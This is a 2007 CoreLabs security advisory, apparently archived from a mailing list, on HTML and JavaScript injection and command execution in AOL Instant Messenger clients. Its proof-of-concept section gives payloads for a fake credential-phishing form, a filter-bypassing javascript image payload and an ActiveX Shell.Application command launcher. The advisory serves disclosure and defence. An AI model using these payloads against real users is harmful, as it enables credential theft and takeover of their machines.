[VulnWatch] CORE-2007-0817: Remote Command execution, HTML and JavaScript injection vulnerabilities in AOL's Instant Messaging software

From: Core Security Technologies Advisories (advisories@private)
Date: Tue Sep 25 2007 - 09:20:55 PDT


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

         Core Security Technologies – CoreLabs Advisory
           http://www.coresecurity.com/corelabs

Remote command execution, HTML and JavaScript injection vulnerabilities in
AOL’s Instant Messaging software

*Advisory Information*

Title: Remote Command execution, HTML and JavaScript injection
vulnerabilities in AOL's Instant Messaging software

Advisory ID: CORE-2007-0817

Advisory URL:
http://www.coresecurity.com/index.php5?module=ContentMod&action=item&id=1924

Date published: 2009-09-25
Date of last update: 2007-09-25
Vendors contacted: AOL LLC.

Release mode: Forced Release

*Vulnerability Information*

Class: Design Error
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 25659
CVE Name: CVE-2007-4901

*Vulnerability Description*

AOL Instant Messenger ("AIM", http://www.aim.com) is an instant messaging
application that allows its users to communicate in real time via text,
voice, and video over the Internet. It is maintained by AOL LLC. AIM Pro
is AOL's business-oriented version of AIM targeted for professional use
with an emphasis on "business-grade" security and integration with email
client and other productivity applications
(http://aimpro.premiumservices.aol.com/) AIM Lite, as defined in its
website (http://x.aim.com/laim/), is a reference application used to test
new technology also developed by AOL and available for the public in the
form of a "light IM client".

A vulnerability was discovered in these three popular versions of AOL
Instant Messaging software, AIM 6.1 (and 6.2 beta), AIM Pro and AIM Lite,
which expose workstations running the IM clients and their users to
several immediate high-risk attack vectors. To support rendering of HTML
content, the vulnerable IM clients use an embedded Internet Explorer
server control. Unfortunately they do not properly sanitize the
potentially malicious input content to be rendered and, as a result, an
attacker might provide malicious HTML content as part of an IM message to
directly exploit Internet Explorer bugs or to target IE‟s security
configuration weaknesses.

In particular this attack vector exposes workstations to:
- - Direct remote execution of arbitrary commands without user interaction.
- - Direct exploitation of IE bugs without user interaction. For example,
  exploitation bugs that normally require the user to click on a URL
  provided by the attacker can be exploited directly using this attack
  vector.
- - Direct injection of scripting code in Internet Explorer. For example,
  remotely injecting JavaScript code into the embedded IE control of the
  AIM client.
- - Remote instantiation of Active X controls in the corresponding security
  zone.
- - Cross-site request forgery and token/cookie manipulation using embedded
  HTML.

*Vulnerable packages*
  AIM 6.1 (6.1.41.2)
  AIM 6.2 (6.2.32.1)
  AIM Pro
  AIM Lite

*Non-vulnerable packages*
  AIM 6.5 (6.5.3.12) - http://beta.aol.com/projects.php?project=aim6
  AIM Express - http://www.aim.com/aimexpress.adp
  Classic AIM 5.9 - http://www.aim.com/get_aim/win/other_win.adp

*Vendor Information, Solutions and Workarounds*

AOL LLC Vendor Statement;

Overview
AOL has become aware of security vulnerabilities in several AIM instant
messaging clients. Successful exploitation of these vulnerabilities could
allow an attacker to execute arbitrary commands on a user's workstation.
AOL has deployed host side filtering on the AIM servers to block this
potentially malicious content from being sent to AIM clients.

Affected Products and Applications
* AIM 6.1
* AIM 6.2
* AIM Pro
* AIM Lite

Solutions
1. Users of AIM can upgrade to the latest version of the AIM beta client
at beta.aol.com.

Acknowledgments
AOL would like to thank Core Security Technologies for responsibly
reporting this issue to AOL and for working with AOL on testing and
mitigating these issues.

*Other workarounds (un-official)*
Workaround #1: Users running AIM on Microsoft Windows XP SP2 or Windows
Server 2003 SP1 may implement Microsoft's "Internet Explorer Local Machine
Zone Lockdown" recommendations to mitigate risk. This will not fix the
reported bugs but will reduce the risk of exploitation significantly.
To enable Local Machine Zone Lockdown for your AIM client, go to the
following registry key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft \Internet
Explorer\Main\FeatureControl\FEATURE_LocalMachine_Lockdown

Add a REG_DWORD value to this key named as the AIM client application (for
example, aim.exe) and set it to 1. Any other setting for this value will
disable Local Machine Zone Lockdown for the application.

For further details about how to configure this feature read Microsoft‟s
Internet Explorer Local Machine Zone Lockdown recommendation at:
http://technet.microsoft.com/enus/library/bb457150.aspx#EHAA

*Credits*
This vulnerability was discovered by Lucas Lavarello from the CORE
Security Consulting Services (CORE SCS) team.

*Technical Description / Proof of Concept Code*

The standard protocol that AIM clients use to communicate is called OSCAR
(Open System for CommunicAtion in Realtime), which is a closed protocol
also used by AOL's secondary Instant Messaging client, ICQ (I Seek You).
On top of the OSCAR protocol, AIM clients have implemented support for
enhanced message types that use features provided by the HTML (Hyper Text
Markup Language) in order to, for example, provide AIM users with the
possibility of exchanging text messages with specific font formats or
colors. AIM 6.1, AIM 6.2 (beta), AIM Pro and AIM Lite have embedded an
Internet Explorer server control in the message display window in order to
facilitate the parsing and displaying of HTML controls. It is a common
practice for Windows applications to reuse Microsoft Internet Explorer‟s
HTML parsing objects included in the mshtml.dll library instead of using a
homebrew HTML parser. Several programming frameworks, including MFC
(Microsoft Foundation Classes), provide practical ways of embedding such
controls through classes like CHtmlEditView or CHtmlEditDoc.
Some of the advantages of using MSHTML are that it provides a particular,
feature-rich and somewhat complete support for DHTML and also that it is
easier to host Microsoft ActiveX Controls. However, in the context of this
advisory, such advantages may end up becoming security problems due to
design flaws and implementation bugs.
There are two particular characteristics in the implementation of the
described functionality that turn AIM‟s highly flexible message-content
features into high-risk attack vectors for its users.

First, the vulnerable IM clients do most of the sanitizing/filtering and
encoding of HTML content on outbound messages, thus a malicious attacker
with the ability to bypass outbound HTML filtering can send any type of
HTML content to other IM clients.
A handful of publicly available and well-known IM clients permit to send
un-sanitized data to any other client that supports the same
communications protocol including the vulnerable AIM 6.1, AIM 6.2, AIM Pro
and AIM Lite clients.
Second, although there are some defensive mechanisms implemented in the
vulnerable clients these are insufficient to properly handle messages with
potentially malicious content. Input validation of inbound messages
appears to be taking place but can be easily circumvented by an attacker.
As a result, the entire attack surface of MSHTML is exposed to remote IM
peers. By having a way of sending data straight to the MSHTML library,
attackers could abuse such high-risk attack vector to:

- - Execute arbitrary shell commands in the victim‟s workstation.
- - Direct the embedded IE to perform arbitrary HTTP requests (CSRF)
- - Include HTML controls (links, images, forms…) in IM text messages in
  order to trick users into revealing sensitive information or performing
  harmful actions against their accounts/workstation/etc.
- - Run JavaScript code within IE to enhance the attacks mentioned above.
- - Instantiate ActiveX controls, which attackers could use to target
  vulnerabilities in the ActiveX objects themselves or use their
  functionality to, for example, read arbitrary files from the victim's
  file system or even execute arbitrary shell commands in the victim's
  workstation.
- - Directly attack vulnerable versions of Internet Explorer in user
  workstations. This is a typical client-side attack scenario and could
  lead to the remote execution of arbitrary code in the victim's
  workstation. In this scenario "one-click" IE bugs (exploitation requires
  user assistance) become "zero-click" bugs (exploitation does not require
  user interaction).

AOL's "Classic AIM 5.9" is an official alternative client for nostalgic
users and is not vulnerable due to the fact that instead of using MSHTML
to render HTML it appears to include limited rendering functionality
either provided by a third party library or homebrew code. Although there
is no guarantee that its implementation lacks vulnerabilities, in our
tests it did prevent the attack vectors described in this advisory. So
is the case for AOL‟s AOL 6.5.3.12 which although it is embedding an
Internet Explorer server control in the message window, could not be
exploited during our tests.
AOL's online AIM Express web client which is written in ASP.NET and also
appears to be taking the necessary defensive measures required to prevent
any of these problems from taking place.

*Proof of concept snippets*
The following examples provide code snippets that should serve as
proof-of-concept code to demonstrate some of the problems that arise from
the issue reported. The snippets have been arranged according to their
risk level, in increasing order (lower risk first), with the
intention of making this process more self-explanatory. In order for these
snippets to work, they must be sent within the contents of a standard
instant message, but using a client that will not encode message contents
on output:

*Using HTML controls in order to trick victims into revealing sensitive
information or do harmful actions against their accounts/workstations or
to force outbound HTTP requests (CSRF).*

The following proof-of-concept code was successfully tested on AIM Pro.
Other vulnerable clients need some tweaking in order to get it to work.
The code uses <hr>, <h2>, <form> and <input> tags to trick the victim into
believing that an AIM disconnection took place. It then requests the
victim to type in the user credentials and to press the Reconnect (submit)
button in order to send the credentials to the attacker. In this
case, the form is submitted to "http://localhost"


- --- begin code ---
<hr><h2>SERVICE UNAVAILABLE</h2><hr>Your connection to AIM has been
interrupted. Please type in your credentials in order to reconnect. Thank
you.<br><form method=GET action=http://localhost>Login: <input type=text
name=login><br>Password: <input type=text name=password><br><input
type=submit value=Reconnect></form><br><hr>
- --- end code ---


This is simply one example of exploitation using only embedded HTML. There
are plenty of HTML controls that could be used in similar exploitation
scenarios.

*Using scripting languages to enhance an attack*

As mentioned in the beginning of the technical details section, we
identified among all the vulnerable clients what appeared to be an
existing defensive measure (or a functional characteristic with a
side-effect) meant to prevent attackers from inserting malicious
JavaScript statements within message contents. When sending JavaScript
statements inside <script> tags within a message, the script tags
appear to be filtered by the receiving client upon display (therefore not
executing the JavaScript statements). However, this was easily
circumvented by embedding JavaScript statements inside <img> tags, as in
the following example:

The following code does not work:
<script>alert(‘I have executed javascript in your computer’)</script>

The following code *does* work:
<img src="javascript:alert(‘I have executed javascript in your computer’)">

Note that even though the different proof-of-concept snippets provided in
this advisory use <img> tags to execute JavaScript, the problem must not
be thought of as circumscribed to message contents with embedded <img>
tags only. JavaScript statements may also be executed through the use of
other HTML controls and some of the attack vectors that we mention do not
even rely on JavaScript for successful exploitation.
The following proof-of-concept code will display a prompt box to the
victim, requesting to type in the victim's AIM credentials. It will look
authentic due to the fact that the message box is not part of the text
message window:

- -- begin code --
<img src='javascript:var passwd=window.prompt("You have been
disconnected from the network.\nPlease re-enter your password to
reconnect.", "");alert(“You have disclosed your password:”+passwd);'>
- -- end code --

Once the victim types-in her/his password, an alert message box will be
displayed showing the entered password. Attackers could easily retrieve
passwords and other security-sensitive data by using the same techniques
used to exploit Cross Site Scripting vulnerabilities to steal browser cookies.

*Instantiating ActiveX controls and taking over the victim’s workstation*

Another way of enhancing an attack could rely on using ActiveX controls
installed on the target system. For that, the attacker needs the ability
to instantiate arbitrary ActiveX controls using an IM message content
constructed to accomplish such purpose. We successfully used this attack
vector in AIM 6.1, AIM 6.2beta and AIM Lite in order to get immediate and
instant access to the victim‟s workstation. This attack vector increases
considerably the severity of the problems found, turning the affected
clients into a doorway to the user‟s computer and ultimately providing
attackers with ways of executing arbitrary commands.
Apparently, AIM Pro is the only client that runs the Internet Explorer
server control in a "protected" security zone, where the victim is
prompted with the typical message box that says:

"An ActiveX control on this page might be unsafe to interact with other
parts of the page. Do you want to allow this interaction?"

The choice of the user will affect the entire instance of the application
and be applied to any other existing/future message windows (as well as
potentially any other locations where the Internet Explorer server
control is used.)

Attackers could use JavaScript to instantiate ActiveX controls in order to
either exploit client-side vulnerabilities of the ActiveX objects
themselves or to use ActiveX functionality as an aid to exploit other bugs..
As the following proof-of-concept snippet shows, an attacker can
successfully instantiate the "Shell.Application" object that is included
in the Microsoft Windows OS installation and use it to execute any
arbitrary command on the victim‟s workstation.

As previously mentioned, in three of the four affected versions of the
product, the attack is straight forward and no interaction with the victim
is required. Such clients appear to be running Internet Explorer control
in the Local Machine Security Zone.

- -- begin code --
<img src="javascript:var oShell = new
ActiveXObject('Shell.Application');oShell.ShellExecute('cmd.exe', '/c
pause');">
- -- end code --

The proof-of-concept code from above will run an instance of Microsoft
Windows command line tool, executing the pause command. Upon receipt, it
will instantly show a blank command window in the victim‟s workstation. An
attacker may easily abuse this issue to gain complete control over the
victim‟s machine with the privileges of the user running AIM.

*Attacking vulnerable versions of Internet Explorer controls*
This scenario is just a clear-cut client-side attack vector and would rely
on any unpatched security vulnerability in Internet Explorer or the
ActiveX controls it hosts. An embedded HTML URI can direct the IE server
control to automatically visit a previously setup site that delivers
malicious content to exploit known Internet Explorer vulnerabilities. In
this case, the AIM clients identified as vulnerable in this advisory play
the role of exposing their users to attacks without requiring user
intervention to allow/disallow access to the rogue website. This attack
scenario is functionally equivalent to a user of Internet Explorer
clicking on a URL and visiting a malicious site.

*Additional Information and resources*

AOL’s AIM clients
  AIM Pro: http://aimpro.premiumservices.aol.com/
  AIM 6.2: http://beta.aol.com/projects.php?project=aim6
  AIM 6.1: http://www.aim.com/get_aim/win/latest_win.adp
  AIM Lite: http://x.aim.com/laim/
  AIM 5.9: http://www.aim.com/get_aim/win/other_win.adp
  AIM 6.5: http://beta.aol.com/projects.php?project=aim6

Embedding IE
  Introduction to ActiveX Controls:
  http://msdn2.microsoft.com/en-us/library/aa751972.aspx

  Reusing MSHTML:
  http://msdn2.microsoft.com/en-us/library/bb508516.aspx

  Internet Explorer Local Machine Zone Lockdown
  http://technet.microsoft.com/en-us/library/bb457150.aspx#EHAA
http://technet2.microsoft.com/windowsserver/en/library/aebcfc94-25d5-4f41-93cc-7fb6e031de401033.mspx?mfr=true

About URL Security Zones
  http://msdn2.microsoft.com/en-us/library/ms537183.aspx

*Report Timeline*

*2007-08-21*: Initial report to AOL Product Vulnerabilities Team (PVT)
requesting acknowledgement within 2 business days, advisory publication
date tentatively set to September 24th.
*2007-08-22*: Received an acknowledgement and PGP public key from AOL's
PVT. AOL's PVT indicates that upon reception of vulnerability details and
bug confirmation, expectations should be to allow for two business weeks
for an estimated timeline to resolution. Core's PGP/GPG key requested.
*2007-08-23*: Draft advisory and GPG public key sent to AOL's PVT.
*2007-08-31*: Acknowledgement from AOL confirming the existence of the
vulnerabilities in AOL's IM clients. AOL indicates that the development
and QA teams are working on fixes with an estimated release scheduled for
mid-October. Additionally, note that one of the IM clients requires
coordination with a third-party.
*2007-09-04*: Reply from Core, acknowledging the previous email from AOL
PVT. Release date for the advisory set to October 16th in accordance to
AOLs estimation. Core indicates that there is no indication of
exploitation "in the wild" but that these bugs are considered extremely
critical due to the simple way they can be found and exploited and the
large population of vulnerable systems.
*2007-09-10*: Email from the AOL PVT indicating that the bugs are
considered extremely critical by AOL as well and expressing their
intention to provide weekly status updates. An estimated date for fixes
will be forthcoming as soon as they have one. In the meantime, a
server-side mitigation mechanism has been deployed and Core is invited to
test it.
*2007-09-10*: Core acknowledges reception of AOL‟s last email. We‟ve taken
up the offer to test the mitigation mechanism and although it did prevent
the original proof-of-concept code snippets from working we found that
attacks are still possible with minor tweaks to the original code. Tests
were performed using only one of the 4 vulnerable clients, the
others are deemed equally vulnerable.
*2007-09-12*: Core email to AOL notifying them that information about the
bug may have been disclosed to public security mailing lists by an unknown
third-party [1]. Precise technical details were not given and therefore it
is difficult to assess if the bug disclosed by the third-party is directly
related to those reported by Core. There are still no indications of
exploitation of these bugs "in the wild". Nonetheless, it is reasonable to
think that the independent discovery and exploitation of the bugs reported
by Core is now imminent, should that happen, Core‟s security advisory will
be published the upcoming week (tentatively Monday Sept. 17th 2007) as a
Forced Release.
*2007-09-14*: Email from AOL PVT indicating that AOL is in correspondence
with the third-party and received additional information about the bug,
leading the AOL team to think that the publicly disclosed vulnerability is
not similar in nature to those reported by Core. The public vulnerability
will be fixed in the AIM clients in mid-October. AOL's PVT does not feel
that this public disclosure warrants disclosure of Core‟s advisory. The
team could not verify that the mitigation mechanism deployed on the server
can still be bypassed as indicated by Core in a previous email. The team
requests the exact version numbers of the AIM clients used, proof of
concept code and/or a description of how to reproduce the test.
*2007-09-14*: Email sent to AOL indicating that a second post with
additional information about the bug has been made by the third-party [2].
Core requests further details about this publicly disclosed bug and asks
AOL to provide the analysis that lead the AOL team to conclude that it is
of a different nature of those reported by Core. This email includes
detailed step-by-step instructions on how to bypass the server-side
filtering mechanism accompanied with the exact version number of the AIM
client used (6.1.41.2) and the sample code. Core's own analysis of current
publicly available information indicates that the bug is indeed of similar
nature than those reported in Core‟s advisory and that active exploitation
of the bug is likely to happen in a matter of days (not several weeks).
Thus, in accordance to Core‟s analysis the most responsible course of
action is to clarify the nature of the AIM problems and provide the
vulnerable users with enough information to assess and mitigate the risk.
Baring any further indication from AOL to support the theory of these
being bugs of different nature, Core will be ready to publish its security
advisory the week of Sept. 17th to 21st.
*2007-09-18*: Email sent to AOL PVT indicating that Core now considers the
information about the reported bugs to be publicly available. The fact
that the third-party reporters did not find (or did not publish) a way to
exploit it remotely in a more reliable manner does not prevent others from
doing so. Core‟s team believes that the publicly available information
about this bug is confusing and does not help vulnerable users understand
the risks they are exposed to. Therefore, unless AOL provides new
information or analysis to change Core‟s analysis, Core will publish the
security advisory to provide vulnerable users with the details needed to
assess risk and devise their own mitigation mechanisms until official
fixed versions of the clients are made available.
*2007-09-19*: Email sent to AOL indicating that information about the
reported vulnerabilities is now part of Mitre CVE dictionary, the US
National Vulnerability Database [3], the Securityfocus.com vulnerability
Database [4] and the Secunia.com website [5], therefore Core considers
that any security-aware party (either good or bad intended) can now easily
figure out a remote exploitation method. In fact, several messages in
AOL's technical forums seem to indicate that users of AIM clients are
experiencing AIM "bugs" or "problems" related to the issues reported in
Core‟s advisory [6],[7] and that AOL itself seems to be using
HTML/JavaScript injection and instantiation of third-party ActiveX
controls [8]. Therefore, to provide accurate information that helps
security practitioners understand the risks and devise mitigation
strategies for affected end users and organizations Core has decided to
release this security advisory on Monday Sept. 24th. AOL‟s statement
regarding release of fixed clients and any other mitigation mechanism is
expected by COB Friday Sept. 21st. In the meantime, Core researchers will
try to find suitable workarounds to prevent exploitation.
*2007-09-20*: Email from AOL PVT indicating that the bug posted publicly
is different than those reported by Core because it “is based upon another
application within the AIM client that allows a limited number of
characters that can be put into a alert message within a script tag,
"<script>alert("Test")</script>". This message will only work when
sending a IM to someone who is using one of the AIM 6.x clients and does
not have the sender focused within their AIM client. When sending a
message to an AIM user who does not have the sender focused in their AIM
client, a notification window will pop up informing the recipient that
they have just received a message from another AIM user. It is this
application in the AIM 6.x clients that is not properly parsing the
messages for this type of html tag and pop's up an alert window.” The
other public problems pointed out by Core posted in AOL‟s message boards
are not caused by AIM clients. AIM client 6.5.3.12 (currently in Beta)
fixes the reported problems and is available for public download (and for
testing). AOL remains unsuccessful trying to verify that the serverside
filtering mechanism can be bypassed and requests additional data (exact
version numbers of the IE on the target system and AIM clients used). AOL
requests to delay publication of the security advisory until the date
previously agreed on (October 16th, 2007) the release of fixes is still on
schedule for mid-October.
*2007-09-20*: Email sent to AOL PVT stating that Core‟s analysis indicates
that the publicly disclosed bug and those reported by Core are of the same
and that in fact the public one is just a trivial variation of one of the
attack scenarios explicitly described by Core. Further details provided
about how to test AOL‟s server-side filtering mechanism (although we don‟t
think the versions of IE and AIM on the source and target system are
relevant to test server-side filtering). Core points out that the messages
on AOL's message boards disclose specific non-malicious HTML code that is
currently being injected into clients, including JavaScript and
instantiation of ActiveX controls and that should be considered directly
related to the bugs reported because they demonstrate that arbitrary HTML
content can be injected into AIM. Core has confirmed that AIM 6.5.3.12 is
not vulnerable to attack (although extensive regression testing of all
possible attack patterns was not performed).
Given all the publicly known facts Core deems active exploitation imminent
and therefore still plans to release the security advisory on Monday Sept.
24th in order to provide precise details to help users become aware of the
risk they are exposed to and to deploy countermeasures to prevent active
exploitation.
*2007-09-21*: Email received from AOL PVT requesting a conference call to
discuss the issues reported and how to handle them.
*2007-09-21*: Conference call between Core Security advisories team,
Core's bug discoverer and AOL PVT. AOL reported that the current version
of AIM 6.5 addresses the bugs reported and that AOL could replicate the
test of the service-side filters and had fixed the bypass. Availability of
fixed release versions of AIM is still scheduled for mid-October. Core
reports that AIM v6.5.3.12 indeed seems to have fixed the problem
(although full regression was not performed) and that the publicly known
information about HTML injection in AIM clients makes it trivial for
attackers to figure out variations of the published code that can succeed
against vulnerable systems. Core will re-test the server-side filtering
mechanism. The final security advisory will be sent to AOL by COB
September Friday 21st and the publication date moved to Tuesday, September
25th, 2007 to incorporate AOL's official statements regarding fixes and
mitigation and final rests of the interim server-side filters. The
publication date is final.
*2007-09-21*: Email sent to AOL PVT indicating the server-filtering has
improved considerably but can still be bypassed. Other variations of the
same type of attack should be blocked.
*2007-09-21*: Email sent to AOL PVT indicating use of Internet Explorer
Local Machine Zone Lockdown recommendation may be a suitable workaround.
*2007-09-24*: Email from AOL PVT including AOL's official statement
regarding this report (included in the "Vendor Information, Solutions and
Workarounds" section).
*2007-09-25*: CoreLabs Security Advisory CORE-2007-0817 published

*References*
[1] AIM Arbitrary HTML Display in Notification Window
    shell at dotshell dot net
    http://www.securityfocus.com/archive/1/479199
[2] AIM Local File Display in Notification Window
    shell at dotshell dot net
    http://www.securityfocus.com/archive/1/479435
[3] http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-4901
[4] http://www.securityfocus.com/bid/25659
[5] http://secunia.com/advisories/26786/
[6] "AIM 6.1 problems" thread on AOL‟s AIM Support & more technical forum
http://messageboards.aol.com/aol/en_us/articles.php?boardId=565563&articleId=16537
[7] "IM problems" thread in AOL‟s AIM 6 Technical Issues forum
http://messageboards.aol.com/aol/en_us/articles.php?boardId=565563&articleId=16537
[8] "Copyright and Confidentiality notice?" thread on AOL‟s AIM 6
Technical Issues forum
http://messageboards.aol.com/aol/en_us/articles.php?boardId=567774&articleId=2400

*About Corelabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies.
We conduct our research in several important areas of computer security
including system vulnerabilities, cyber attack planning and simulation,
source code auditing, and cryptography. Our results include problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs/

*About Core Security Technologies*
Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core augments its
leading technology solution with world-class security consulting services,
including penetration testing and software security auditing.
Based in Boston, MA and Buenos Aires, Argentina, Core Security
Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.

*DISCLAIMER*
The contents of this advisory are copyright (c) 2007 CORE Security
Technologies and (c) 2007 CoreLabs, and may be distributed freely provided
that no fee is charged for this distribution and proper credit is given.
PGP/GPG KEYS This advisory has been signed with the GPG key of Core
Security Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)

iD8DBQFG+TVmyNibggitWa0RAqU2AKCkKyHFV++w+C2hkI5WAAPFAgxDfgCgo/Ep
3iXG4YKx/yIyimYHwGzOg8o=
=uUHp
-----END PGP SIGNATURE-----



This archive was generated by hypermail 2.1.3 : Thu Sep 27 2007 - 15:02:40 PDT